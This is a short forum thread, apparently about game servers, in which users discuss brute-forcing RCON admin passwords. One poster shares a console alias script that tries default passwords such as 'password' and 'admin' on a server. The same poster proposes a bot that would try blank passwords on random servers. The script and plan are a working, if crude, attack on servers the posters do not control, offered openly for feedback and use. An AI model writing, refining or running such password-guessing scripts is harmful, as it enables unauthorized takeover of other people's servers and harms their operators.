u can brute force some i've tried it
http://forums.myg0t.com/showthread.php?t=13432
ne ways can u just go "rcon sv_cheats 1" 1 hundread times without the password would that casue lag???
i tested the script it worked fine, i am thinking cause there is no deafult password to make a bot that trys blank passwords on random servers anyways non of you'se have givin me feedback on the script.
i've been thinking and i thought of a brute force rcon cracker script i just want to know what u guys think of it.
alias init "developer 1"
alias w "wait;wait;wait;wait;wait"
alias t1 "rcon_password password;w;rcon say rcon password = password"
alias t2 "rcon_password admin;w;rcon say rcon password = admin"
alias run "init;t1;w;t2;w;stop"
alias stop "developer 0"
bind n run
this script is still in testing stage.